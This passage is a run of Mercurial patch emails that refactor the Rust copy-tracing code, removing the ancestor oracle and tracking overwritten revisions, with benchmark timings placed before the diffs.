× 1.1098, 8 µs/rev mozilla-central x_revs_x_added_0_copies 3697f962bb7b 7015fcdd43a2 : 2 revs, 0.000087 s, 0.000089 s, +0.000002 s, × 1.0230, 44 µs/rev mozilla-central x_revs_x000_added_0_copies dd390860c6c9 40d0c5bed75d : 8 revs, 0.000268 s, 0.000265 s, -0.000003 s, × 0.9888, 33 µs/rev mozilla-central x_revs_x_added_x_copies 8d198483ae3b 14207ffc2b2f : 9 revs, 0.000181 s, 0.000381 s, +0.000200 s, × 2.1050, 42 µs/rev mozilla-central x_revs_x00_added_x_copies 98cbc58cc6bc 446a150332c3 : 7 revs, 0.000661 s, 0.000672 s, +0.000011 s, × 1.0166, 96 µs/rev mozilla-central x_revs_x000_added_x000_copies 3c684b4b8f68 0a5e72d1b479 : 3 revs, 0.003256 s, 0.003497 s, +0.000241 s, × 1.0740, 1165 µs/rev mozilla-central x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.066749 s, 0.073204 s, +0.006455 s, × 1.0967, 12200 µs/rev mozilla-central x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006462 s, 0.006482 s, +0.000020 s, × 1.0031, 4 µs/rev mozilla-central x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.004919 s, 0.005066 s, +0.000147 s, × 1.0299, 123 µs/rev mozilla-central x000_revs_x000_added_x000_copies 7c97034feb78 4407bd0c6330 : 7839 revs, 0.062421 s, 0.065707 s, +0.003286 s, × 1.0526, 8 µs/rev mozilla-central x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.026633 s, 0.026800 s, +0.000167 s, × 1.0063, 43 µs/rev mozilla-central x0000_revs_xx000_added_x000_copies f78c615a656c 96a38b690156 : 30263 revs, 0.197792 s, 0.203856 s, +0.006064 s, × 1.0307, 6 µs/rev mozilla-central x00000_revs_x0000_added_x0000_copies 6832ae71433c 4c222a1d9a00 : 153721 revs, 1.259970 s, 1.293394 s, +0.033424 s, × 1.0265, 8 µs/rev mozilla-central x00000_revs_x00000_added_x000_copies 76caed42cf7c 1daa622bbe42 : 204976 revs, 1.689184 s, 1.698239 s, +0.009055 s, × 1.0054, 8 µs/rev mozilla-try x_revs_x_added_0_copies aaf6dde0deb8 9790f499805a : 2 revs, 0.000865 s, 0.000875 s, +0.000010 s, × 1.0116, 437 µs/rev mozilla-try x_revs_x000_added_0_copies d8d0222927b4 5bb8ce8c7450 : 2 revs, 0.000893 s, 0.000891 s, -0.000002 s, × 0.9978, 445 µs/rev mozilla-try x_revs_x_added_x_copies 092fcca11bdb 936255a0384a : 4 revs, 0.000172 s, 0.000292 s, +0.000120 s, × 1.6977, 73 µs/rev mozilla-try x_revs_x00_added_x_copies b53d2fadbdb5 017afae788ec : 2 revs, 0.001159 s, 0.003939 s, +0.002780 s, × 3.3986, 1969 µs/rev mozilla-try x_revs_x000_added_x000_copies 20408ad61ce5 6f0ee96e21ad : 1 revs, 0.031621 s, 0.033027 s, +0.001406 s, × 1.0445, 33027 µs/rev mozilla-try x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.068571 s, 0.073703 s, +0.005132 s, × 1.0748, 12283 µs/rev mozilla-try x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006452 s, 0.006469 s, +0.000017 s, × 1.0026, 4 µs/rev mozilla-try x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.005443 s, 0.005278 s, -0.000165 s, × 0.9697, 128 µs/rev mozilla-try x000_revs_x000_added_x000_copies 1346fd0130e4 4c65cbdabc1f : 6657 revs, 0.063180 s, 0.064995 s, +0.001815 s, × 1.0287, 9 µs/rev mozilla-try x0000_revs_x_added_0_copies 63519bfd42ee a36a2a865d92 : 40314 revs, 0.293564 s, 0.301041 s, +0.007477 s, × 1.0255, 7 µs/rev mozilla-try x0000_revs_x_added_x_copies 9fe69ff0762d bcabf2a78927 : 38690 revs, 0.286595 s, 0.285575 s, -0.001020 s, × 0.9964, 7 µs/rev mozilla-try x0000_revs_xx000_added_x_copies 156f6e2674f2 4d0f2c178e66 : 8598 revs, 0.083256 s, 0.085597 s, +0.002341 s, × 1.0281, 9 µs/rev mozilla-try x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.027282 s, 0.027118 s, -0.000164 s, × 0.9940, 44 µs/rev mozilla-try x0000_revs_xx000_added_x000_copies 89294cd501d9 7ccb2fc7ccb5 : 97052 revs, 1.343373 s, 2.119204 s, +0.775831 s, × 1.5775, 21 µs/rev mozilla-try x0000_revs_x0000_added_x0000_copies e928c65095ed e951f4ad123a : 52031 revs, 0.665737 s, 0.701479 s, +0.035742 s, × 1.0537, 13 µs/rev mozilla-try x00000_revs_x_added_0_copies 6a320851d377 1ebb79acd503 : 363753 revs, 5.138169 s, 4.482399 s, -0.655770 s, × 0.8724, 12 µs/rev mozilla-try x00000_revs_x00000_added_0_copies dc8a3ca7010e d16fde900c9c : 34414 revs, 0.573276 s, 0.574082 s, +0.000806 s, × 1.0014, 16 µs/rev mozilla-try x00000_revs_x_added_x_copies 5173c4b6f97c 95d83ee7242d : 362229 revs, 5.127809 s, 4.480366 s, -0.647443 s, × 0.8737, 12 µs/rev mozilla-try x00000_revs_x000_added_x_copies 9126823d0e9c ca82787bb23c : 359344 revs, 4.971136 s, 4.369070 s, -0.602066 s, × 0.8789, 12 µs/rev mozilla-try x00000_revs_x0000_added_x0000_copies 8d3fafa80d4b eb884023b810 : 192665 revs, 1.741678 s, 1.592506 s, -0.149172 s, × 0.9144, 8 µs/rev mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 40.314822 s, 87.824489 s, +47.509667 s, × 2.1785, 383 µs/rev mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 20.048029 s, 43.304637 s, +23.256608 s, × 2.1600, 113 µs/rev private : 459513 revs, 37.179470 s, 33.853687 s, -3.325783 s, × 0.9105, 73 µs/rev Differential Revision: https://phab.mercurial-scm.org/D9644 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -9,6 +9,7 @@ use std::cmp::Ordering; use std::collections::HashMap; +use std::collections::HashSet; use std::convert::TryInto; pub type PathCopies = HashMap<HgPathBuf, HgPathBuf>; @@ -22,6 +23,9 @@ /// the copy source, (Set to None in case of deletion of the associated /// key) path: Option<PathToken>, + /// a set of previous `CopySource.rev` value directly or indirectly + /// overwritten by this one. + overwritten: HashSet<Revision>, } impl CopySource { @@ -29,7 +33,11 @@ /// /// Use this when no previous copy source existed. fn new(rev: Revision, path: Option<PathToken>) -> Self { - Self { rev, path } + Self { + rev, + path, + overwritten: HashSet::new(), + } } /// create a new CopySource from merging two others @@ -37,9 +45,15 @@ /// Use this when merging two InternalPathCopies requires active merging of /// some entries. fn new_from_merge(rev: Revision, winner: &Self, loser: &Self) -> Self { + let mut overwritten = HashSet::new(); + overwritten.extend(winner.overwritten.iter().copied()); + overwritten.extend(loser.overwritten.iter().copied()); + overwritten.insert(winner.rev); + overwritten.insert(loser.rev); Self { rev, path: winner.path, + overwritten: overwritten, } } @@ -47,6 +61,7 @@ /// /// Use this when recording copy information from parent → child edges fn overwrite(&mut self, rev: Revision, path: Option<PathToken>) { + self.overwritten.insert(self.rev); self.rev = rev; self.path = path; } @@ -55,9 +70,14 @@ /// /// Use this when recording copy information from parent → child edges fn mark_delete(&mut self, rev: Revision) { + self.overwritten.insert(self.rev); self.rev = rev; self.path = None; } + + fn is_overwritten_by(&self, other: &Self) -> bool { + other.overwritten.contains(&self.rev) + } } /// maps CopyDestination to Copy Source (+ a "timestamp" for the operation) @@ -834,8 +854,12 @@ if src_major.path.is_none() { // We cannot get different copy information for both p1 and p2 // from the same revision. Unless this was a - // deletion - (MergePick::Any, false) + // deletion. + // + // However the deletion might come over different data on each + // branch. + let need_over = src_major.overwritten != src_minor.overwritten; + (MergePick::Any, need_over) } else { unreachable!(); } @@ -852,10 +876,11 @@ // we have the same value, but from other source; if src_major.rev == src_minor.rev { // If the two entry are identical, they are both valid + debug_assert!(src_minor.overwritten == src_minor.overwritten); (MergePick::Any, false) - } else if oracle.is_overwrite(src_major.rev, src_minor.rev) { + } else if src_major.is_overwritten_by(src_minor) { (MergePick::Minor, false) - } else if oracle.is_overwrite(src_minor.rev, src_major.rev) { + } else if src_minor.is_overwritten_by(src_major) { (MergePick::Major, false) } else { (MergePick::Any, true) @@ -884,7 +909,7 @@ // salvaged by the merge, unconditionnaly preserve the // major side. (MergePick::Major, true) - } else if oracle.is_overwrite(src_minor.rev, src_major.rev) { + } else if src_minor.is_overwritten_by(src_major) { // The information from the minor version are strictly older than // the major version if action == MergeCase::Merged { @@ -898,7 +923,7 @@ // No activity on the minor branch, pick the newer one. (MergePick::Major, false) } - } else if oracle.is_overwrite(src_major.rev, src_minor.rev) { + } else if src_major.is_overwritten_by(src_minor) { if action == MergeCase::Merged { // If the file was actively merged, its means some non-copy // activity happened on the other branch. It # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608052977 -3600 # Tue Dec 15 18:22:57 2020 +0100 # Node ID 34827c95092ce7d70e2242cb6370d1133b30bb4c # Parent 0d840b9d200d3de5d9ee6ef5eddd2b0b0cee6743 copies-rust: remove the ancestor Oracle logic We are not doing any `is_ancestor` call anymore. So we can drop that logic and associated arguments. Differential Revision: https://phab.mercurial-scm.org/D9645 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -363,7 +363,7 @@ if rustmod is not None: final_copies = rustmod.combine_changeset_copies( - list(revs), children_count, targetrev, revinfo, isancestor + list(revs), children_count, targetrev, revinfo ) else: isancestor = cached_is_ancestor(isancestor) diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -281,46 +281,6 @@ } } -/// A struct responsible for answering "is X ancestors of Y" quickly -/// -/// The structure will delegate ancestors call to a callback, and cache the -/// result. -#[derive(Debug)] -struct AncestorOracle<'a, A: Fn(Revision, Revision) -> bool> { - inner: &'a A, - pairs: HashMap<(Revision, Revision), bool>, -} - -impl<'a, A: Fn(Revision, Revision) -> bool> AncestorOracle<'a, A> { - fn new(func: &'a A) -> Self { - Self { - inner: func, - pairs: HashMap::default(), - } - } - - fn record_overwrite(&mut self, anc: Revision, desc: Revision) { - self.pairs.insert((anc, desc), true); - } - - /// returns `true` if `anc` is an ancestors of `desc`, `false` otherwise - fn is_overwrite(&mut self, anc: Revision, desc: Revision) -> bool { - if anc > desc { - false - } else if anc == desc { - true - } else { - if let Some(b) = self.pairs.get(&(anc, desc)) { - *b - } else { - let b = (self.inner)(anc, desc); - self.pairs.insert((anc, desc), b); - b - } - } - } -} - struct ActionsIterator<'a> { changes: &'a ChangedFiles<'a>, parent: Parent, @@ -419,15 +379,13 @@ /// * ChangedFiles /// isancestors(low_rev, high_rev): callback to check if a revision is an /// ancestor of another -pub fn combine_changeset_copies<A: Fn(Revision, Revision) -> bool, D>( +pub fn combine_changeset_copies<D>( revs: Vec<Revision>, mut children_count: HashMap<Revision, usize>, target_rev: Revision, rev_info: RevInfoMaker<D>, - is_ancestor: &A, ) -> PathCopies { let mut all_copies = HashMap::new(); - let mut oracle = AncestorOracle::new(is_ancestor); let mut path_map = TwoWayPathMap::default(); @@ -450,7 +408,6 @@ // combine it with data for that revision let vertex_copies = add_from_changes( &mut path_map, - &mut oracle, &parent_copies, &changes, Parent::FirstParent, @@ -471,7 +428,6 @@ // combine it with data for that revision let vertex_copies = add_from_changes( &mut path_map, - &mut oracle, &parent_copies, &changes, Parent::SecondParent, @@ -491,7 +447,6 @@ vertex_copies, copies, &changes, - &mut oracle, )), }; } @@ -548,9 +503,8 @@ /// Combine ChangedFiles with some existing PathCopies information and return /// the result -fn add_from_changes<A: Fn(Revision, Revision) -> bool>( +fn add_from_changes( path_map: &mut TwoWayPathMap, - oracle: &mut AncestorOracle<A>, base_copies: &InternalPathCopies, changes: &ChangedFiles, parent: Parent, @@ -582,7 +536,6 @@ } Entry::Occupied(mut slot) => { let ttpc = slot.get_mut(); - oracle.record_overwrite(ttpc.rev, current_rev); ttpc.overwrite(current_rev, entry); } } @@ -595,7 +548,6 @@ // InternalPathCopies object. let deleted = path_map.tokenize(deleted_path); copies.entry(deleted).and_modify(|old| { - oracle.record_overwrite(old.rev, current_rev); old.mark_delete(current_rev); }); } @@ -608,31 +560,27 @@ /// /// In case of conflict, value from "major" will be picked, unless in some /// cases. See inline documentation for details. -fn merge_copies_dict<A: Fn(Revision, Revision) -> bool>( +fn merge_copies_dict( path_map: &TwoWayPathMap, current_merge: Revision, mut minor: InternalPathCopies, mut major: InternalPathCopies, changes: &ChangedFiles, - oracle: &mut AncestorOracle<A>, ) -> InternalPathCopies { // This closure exist as temporary help while multiple developper are // actively working on this code. Feel free to re-inline it once this // code is more settled. - let cmp_value = |oracle: &mut AncestorOracle<A>, - dest: &PathToken, - src_minor: &CopySource, - src_major: &CopySource| { - compare_value( - path_map, - current_merge, - changes, - oracle, - dest, - src_minor, - src_major, - ) - }; + let cmp_value = + |dest: &PathToken, src_minor: &CopySource, src_major: &CopySource| { + compare_value( + path_map, + current_merge, + changes, + dest, + src_minor, + src_major, + ) + }; if minor.is_empty() { major } else if major.is_empty() { @@ -661,10 +609,8 @@ } Some(src_major) => { let (pick, overwrite) = - cmp_value(oracle, &dest, &src_minor, src_major); + cmp_value(&dest, &src_minor, src_major); if overwrite { - oracle.record_overwrite(src_minor.rev, current_merge); - oracle.record_overwrite(src_major.rev, current_merge); let src = match pick { MergePick::Major => CopySource::new_from_merge( current_merge, @@ -704,10 +650,8 @@ } Some(src_minor) => { let (pick, overwrite) = - cmp_value(oracle, &dest, src_minor, &src_major); + cmp_value(&dest, src_minor, &src_major); if overwrite { - oracle.record_overwrite(src_minor.rev, current_merge); - oracle.record_overwrite(src_major.rev, current_merge); let src = match pick { MergePick::Major => CopySource::new_from_merge( current_merge, @@ -769,10 +713,8 @@ let (dest, src_major) = new; let (_, src_minor) = old; let (pick, overwrite) = - cmp_value(oracle, dest, src_minor, src_major); + cmp_value(dest, src_minor, src_major); if overwrite { - oracle.record_overwrite(src_minor.rev, current_merge); - oracle.record_overwrite(src_major.rev, current_merge); let src = match pick { MergePick::Major => CopySource::new_from_merge( current_merge, @@ -840,11 +782,10 @@ /// decide which side prevails in case of conflicting values #[allow(clippy::if_same_then_else)] -fn compare_value<A: Fn(Revision, Revision) -> bool>( +fn compare_value( path_map: &TwoWayPathMap, current_merge: Revision, changes: &ChangedFiles, - oracle: &mut AncestorOracle<A>, dest: &PathToken, src_minor: &CopySource, src_major: &CopySource, diff --git a/rust/hg-cpython/src/copy_tracing.rs b/rust/hg-cpython/src/copy_tracing.rs --- a/rust/hg-cpython/src/copy_tracing.rs +++ b/rust/hg-cpython/src/copy_tracing.rs @@ -1,5 +1,4 @@ use cpython::ObjectProtocol; -use cpython::PyBool; use cpython::PyBytes; use cpython::PyDict; use cpython::PyList; @@ -26,32 +25,10 @@ children_count: PyDict, target_rev: Revision, rev_info: PyObject, - is_ancestor: PyObject, ) -> PyResult<PyDict> { let revs: PyResult<_> = revs.iter(py).map(|r| Ok(r.extract(py)?)).collect(); - // Wrap the `is_ancestor` python callback as a Rust closure - // - // No errors are expected from the Python side, and they will should only - // happens in case of programing error or severe data corruption. Such - // errors will raise panic and the rust-cpython harness will turn them into - // Python exception. - let is_ancestor_wrap = |anc: Revision, desc: Revision| -> bool { - is_ancestor - .call(py, (anc, desc), None) - .expect( - "rust-copy-tracing: python call to `is_ancestor` \ - failed", - ) - .cast_into::<PyBool>(py) - .expect( - "rust-copy-tracing: python call to `is_ancestor` \ - returned unexpected non-Bool value", - ) - .is_true() - }; - // Wrap the `rev_info_maker` python callback as a Rust closure // // No errors are expected from the Python side, and they will should only @@ -104,7 +81,6 @@ children_count?, target_rev, rev_info_maker, - &is_ancestor_wrap, ); let out = PyDict::new(py); for (dest, source) in res.into_iter() { @@ -134,8 +110,7 @@ revs: PyList, children: PyDict, target_rev: Revision, - rev_info: PyObject, - is_ancestor: PyObject + rev_info: PyObject ) ), )?; # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608107425 -3600 # Wed Dec 16 09:30:25 2020 +0100 # Node ID 389b0328b7896766998c203bb6fa96bdbcbee41e # Parent 34827c95092ce7d70e2242cb6370d1133b30bb4c copies-rust: get the parents' copies earlier This remove some conditional nesting and prepare for future work were we will unify the handling of copies from p1 and p2. Differential Revision: https://phab.mercurial-scm.org/D9646 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -397,59 +397,60 @@ // the individual copies information the curent revision. Creating a // new TimeStampedPath for each `rev` → `children` vertex. let mut copies: Option<InternalPathCopies> = None; - if p1 != NULL_REVISION { - // Retrieve data computed in a previous iteration - let parent_copies = get_and_clean_parent_copies( + // Retrieve data computed in a previous iteration + let p1_copies = match p1 { + NULL_REVISION => None, + _ => get_and_clean_parent_copies( &mut all_copies, &mut children_count, p1, - ); - if let Some(parent_copies) = parent_copies { - // combine it with data for that revision - let vertex_copies = add_from_changes( - &mut path_map, - &parent_copies, - &changes, - Parent::FirstParent, - rev, - ); - // keep that data around for potential later combination - copies = Some(vertex_copies); - } - } - if p2 != NULL_REVISION { - // Retrieve data computed in a previous iteration - let parent_copies = get_and_clean_parent_copies( + ), // will be None if the vertex is not to be traversed + }; + let p2_copies = match p2 { + NULL_REVISION => None, + _ => get_and_clean_parent_copies( &mut all_copies, &mut children_count, p2, + ), // will be None if the vertex is not to be traversed + }; + if let Some(parent_copies) = p1_copies { + // combine it with data for that revision + let vertex_copies = add_from_changes( + &mut path_map, + &parent_copies, + &changes, + Parent::FirstParent, + rev, ); - if let Some(parent_copies) = parent_copies { - // combine it with data for that revision - let vertex_copies = add_from_changes( - &mut path_map, - &parent_copies, - &changes, - Parent::SecondParent, - rev, - ); + // keep that data around for potential later combination + copies = Some(vertex_copies); + } + if let Some(parent_copies) = p2_copies { + // combine it with data for that revision + let vertex_copies = add_from_changes( + &mut path_map, + &parent_copies, + &changes, + Parent::SecondParent, + rev, + ); - copies = match copies { - None => Some(vertex_copies), - // Merge has two parents needs to combines their copy - // information. - // - // If we got data from both parents, We need to combine - // them. - Some(copies) => Some(merge_copies_dict( - &path_map, - rev, - vertex_copies, - copies, - &changes, - )), - }; - } + copies = match copies { + None => Some(vertex_copies), + // Merge has two parents needs to combines their copy + // information. + // + // If we got data from both parents, We need to combine + // them. + Some(copies) => Some(merge_copies_dict( + &path_map, + rev, + vertex_copies, + copies, + &changes, + )), + }; } match copies { Some(copies) => { # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608108124 -3600 # Wed Dec 16 09:42:04 2020 +0100 # Node ID f8bdc8329d7718d86976c8b601a67c0c02dd0303 # Parent 389b0328b7896766998c203bb6fa96bdbcbee41e copies-rust: use matching to select the final copies information This is a bit more idiomatic and this prepare a future refactoring where InternalCopies from both parent would be updated at the same time. Differential Revision: https://phab.mercurial-scm.org/D9647 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -414,49 +414,37 @@ p2, ), // will be None if the vertex is not to be traversed }; - if let Some(parent_copies) = p1_copies { - // combine it with data for that revision - let vertex_copies = add_from_changes( + // combine it with data for that revision + let p1_copies = match p1_copies { + None => None, + Some(parent_copies) => Some(add_from_changes( &mut path_map, &parent_copies, &changes, Parent::FirstParent, rev, - ); - // keep that data around for potential later combination - copies = Some(vertex_copies); - } - if let Some(parent_copies) = p2_copies { - // combine it with data for that revision - let vertex_copies = add_from_changes( + )), + }; + let p2_copies = match p2_copies { + None => None, + Some(parent_copies) => Some(add_from_changes( &mut path_map, &parent_copies, &changes, Parent::SecondParent, rev, - ); - - copies = match copies { - None => Some(vertex_copies), - // Merge has two parents needs to combines their copy - // information. - // - // If we got data from both parents, We need to combine - // them. - Some(copies) => Some(merge_copies_dict( - &path_map, - rev, - vertex_copies, - copies, - &changes, - )), - }; - } - match copies { - Some(copies) => { - all_copies.insert(rev, copies); - } - _ => {} + )), + }; + let copies = match (p1_copies, p2_copies) { + (None, None) => None, + (c, None) => c, + (None, c) => c, + (Some(p1_copies), Some(p2_copies)) => Some(merge_copies_dict( + &path_map, rev, p2_copies, p1_copies, &changes, + )), + }; + if let Some(c) = copies { + all_copies.insert(rev, c); } } # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608109294 -3600 # Wed Dec 16 10:01:34 2020 +0100 # Node ID d2ad44b8ef6a63a7b74a122975a6dc6b8b26caaa # Parent f8bdc8329d7718d86976c8b601a67c0c02dd0303 copies-rust: extract the processing of a single copy information This will make it easy to process copy from both p1 and p2 in the same `add_from_changes` call. Differential Revision: https://phab.mercurial-scm.org/D9648 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -503,31 +503,14 @@ for action in changes.iter_actions(parent) { match action { Action::Copied(path_dest, path_source) => { - let dest = path_map.tokenize(path_dest); - let source = path_map.tokenize(path_source); - let entry; - if let Some(v) = base_copies.get(&source) { - entry = match &v.path { - Some(path) => Some((*(path)).to_owned()), - None => Some(source.to_owned()), - } - } else { - entry = Some(source.to_owned()); - } - // Each new entry is introduced by the children, we - // record this information as we will need it to take - // the right decision when merging conflicting copy - // information. See merge_copies_dict for details. - match copies.entry(dest) { - Entry::Vacant(slot) => { - let ttpc = CopySource::new(current_rev, entry); - slot.insert(ttpc); - } - Entry::Occupied(mut slot) => { - let ttpc = slot.get_mut(); - ttpc.overwrite(current_rev, entry); - } - } + add_one_copy( + current_rev, + &mut path_map, + &mut copies, + &base_copies, + path_dest, + path_source, + ); } Action::Removed(deleted_path) => { // We must drop copy information for removed file. @@ -545,6 +528,44 @@ copies } +// insert one new copy information in an InternalPathCopies +// +// This deal with chaining and overwrite. +fn add_one_copy( + current_rev: Revision, + path_map: &mut TwoWayPathMap, + copies: &mut InternalPathCopies, + base_copies: &InternalPathCopies, + path_dest: &HgPath, + path_source: &HgPath, +) { + let dest = path_map.tokenize(path_dest); + let source = path_map.tokenize(path_source); + let entry; + if let Some(v) = base_copies.get(&source) { + entry = match &v.path { + Some(path) => Some((*(path)).to_owned()), + None => Some(source.to_owned()), + } + } else { + entry = Some(source.to_owned()); + } + // Each new entry is introduced by the children, we + // record this information as we will need it to take + // the right decision when merging conflicting copy + // information. See merge_copies_dict for details. + match copies.entry(dest) { + Entry::Vacant(slot) => { + let ttpc = CopySource::new(current_rev, entry); + slot.insert(ttpc); + } + Entry::Occupied(mut slot) => { + let ttpc = slot.get_mut(); + ttpc.overwrite(current_rev, entry); + } + } +} + /// merge two copies-mapping together, minor and major /// /// In case of conflict, value from "major" will be picked, unless in some # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608542656 -3600 # Mon Dec 21 10:24:16 2020 +0100 # Node ID a34cd9aa33234c67d658c1a487111e7ca376a025 # Parent d2ad44b8ef6a63a7b74a122975a6dc6b8b26caaa copies-rust: yield both p1 and p2 copies in `ChangedFiles.actions()` Instead of filtering the relevant parent inside de ChangedFiles method, we now yield all copies information and let the caller do the filtering. Soon, the filtering will be replaced by dispatching. Differential Revision: https://phab.mercurial-scm.org/D9649 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -107,7 +107,8 @@ Removed(&'a HgPath), /// The parent ? children edge introduce copy information between (dest, /// source) - Copied(&'a HgPath, &'a HgPath), + CopiedFromP1(&'a HgPath, &'a HgPath), + CopiedFromP2(&'a HgPath, &'a HgPath), } /// This express the possible "special" case we can get in a merge @@ -246,10 +247,9 @@ } /// Return an iterator over all the `Action` in this instance. - fn iter_actions(&self, parent: Parent) -> ActionsIterator { + fn iter_actions(&self) -> ActionsIterator { ActionsIterator { changes: &self, - parent: parent, current: 0, } } @@ -283,7 +283,6 @@ struct ActionsIterator<'a> { changes: &'a ChangedFiles<'a>, - parent: Parent, current: u32, } @@ -291,10 +290,6 @@ type Item = Action<'a>; fn next(&mut self) -> Option<Action<'a>> { - let copy_flag = match self.parent { - Parent::FirstParent => P1_COPY, - Parent::SecondParent => P2_COPY, - }; while self.current < self.changes.nb_items { let (flags, file, source) = self.changes.entry(self.current); self.current += 1; @@ -302,8 +297,10 @@ return Some(Action::Removed(file)); } let copy = flags & COPY_MASK; - if copy == copy_flag { - return Some(Action::Copied(file, source)); + if copy == P1_COPY { + return Some(Action::CopiedFromP1(file, source)); + } else if copy == P2_COPY { + return Some(Action::CopiedFromP2(file, source)); } } return None; @@ -500,17 +497,33 @@ current_rev: Revision, ) -> InternalPathCopies { let mut copies = base_copies.clone(); - for action in changes.iter_actions(parent) { + for action in changes.iter_actions() { match action { - Action::Copied(path_dest, path_source) => { - add_one_copy( - current_rev, - &mut path_map, - &mut copies, - &base_copies, - path_dest, - path_source, - ); + Action::CopiedFromP1(path_dest, path_source) => { + match parent { + _ => (), // not the parent we are looking for + Parent::FirstParent => add_one_copy( + current_rev, + path_map, + &mut copies, + &base_copies, + path_dest, + path_source, + ), + }; + } + Action::CopiedFromP2(path_dest, path_source) => { + match parent { + _ => (), //not the parent we are looking for + Parent::SecondParent => add_one_copy( + current_rev, + path_map, + &mut copies, + &base_copies, + path_dest, + path_source, + ), + }; } Action::Removed(deleted_path) => { // We must drop copy information for removed file. # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608111968 -3600 # Wed Dec 16 10:46:08 2020 +0100 # Node ID 600f8d510ab617dfe00586a751ddb2e23ffcd774 # Parent a34cd9aa33234c67d658c1a487111e7ca376a025 copies-rust: process copy information of both parent at the same time This avoid a double iteration and this open the way to a better handing of deletion. That better handling of deletion is the core reason we are doing this refactoring. Differential Revision: https://phab.mercurial-scm.org/D9650 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -323,15 +323,6 @@ pub type RevInfoMaker<'a, D> = Box<dyn for<'r> Fn(Revision, &'r mut DataHolder<D>) -> RevInfo<'r> + 'a>; -/// enum used to carry information about the parent → child currently processed -#[derive(Copy, Clone, Debug)] -enum Parent { - /// The `p1(x) → x` edge - FirstParent, - /// The `p2(x) → x` edge - SecondParent, -} - /// A small "tokenizer" responsible of turning full HgPath into lighter /// PathToken /// @@ -393,7 +384,6 @@ // We will chain the copies information accumulated for the parent with // the individual copies information the curent revision. Creating a // new TimeStampedPath for each `rev` → `children` vertex. - let mut copies: Option<InternalPathCopies> = None; // Retrieve data computed in a previous iteration let p1_copies = match p1 { NULL_REVISION => None, @@ -412,26 +402,8 @@ ), // will be None if the vertex is not to be traversed }; // combine it with data for that revision - let p1_copies = match p1_copies { - None => None, - Some(parent_copies) => Some(add_from_changes( - &mut path_map, - &parent_copies, - &changes, - Parent::FirstParent, - rev, - )), - }; - let p2_copies = match p2_copies { - None => None, - Some(parent_copies) => Some(add_from_changes( - &mut path_map, - &parent_copies, - &changes, - Parent::SecondParent, - rev, - )), - }; + let (p1_copies, p2_copies) = + chain_changes(&mut path_map, p1_copies, p2_copies, &changes, rev); let copies = match (p1_copies, p2_copies) { (None, None) => None, (c, None) => c, @@ -489,41 +461,47 @@ /// Combine ChangedFiles with some existing PathCopies information and return /// the result -fn add_from_changes( +fn chain_changes( path_map: &mut TwoWayPathMap, - base_copies: &InternalPathCopies, + base_p1_copies: Option<InternalPathCopies>, + base_p2_copies: Option<InternalPathCopies>, changes: &ChangedFiles, - parent: Parent, current_rev: Revision, -) -> InternalPathCopies { - let mut copies = base_copies.clone(); +) -> (Option<InternalPathCopies>, Option<InternalPathCopies>) { + // Fast path the "nothing to do" case. + if let (None, None) = (&base_p1_copies, &base_p2_copies) { + return (None, None); + } + + let mut p1_copies = base_p1_copies.clone(); + let mut p2_copies = base_p2_copies.clone(); for action in changes.iter_actions() { match action { Action::CopiedFromP1(path_dest, path_source) => { - match parent { - _ => (), // not the parent we are looking for - Parent::FirstParent => add_one_copy( + match &mut p1_copies { + None => (), // This is not a vertex we should proceed. + Some(copies) => add_one_copy( current_rev, path_map, - &mut copies, - &base_copies, + copies, + base_p1_copies.as_ref().unwrap(), path_dest, path_source, ), - }; + } } Action::CopiedFromP2(path_dest, path_source) => { - match parent { - _ => (), //not the parent we are looking for - Parent::SecondParent => add_one_copy( + match &mut p2_copies { + None => (), // This is not a vertex we should proceed. + Some(copies) => add_one_copy( current_rev, path_map, - &mut copies, - &base_copies, + copies, + base_p2_copies.as_ref().unwrap(), path_dest, path_source, ), - }; + } } Action::Removed(deleted_path) => { // We must drop copy information for removed file. @@ -532,13 +510,26 @@ // propagate this information when merging two // InternalPathCopies object. let deleted = path_map.tokenize(deleted_path); - copies.entry(deleted).and_modify(|old| { - 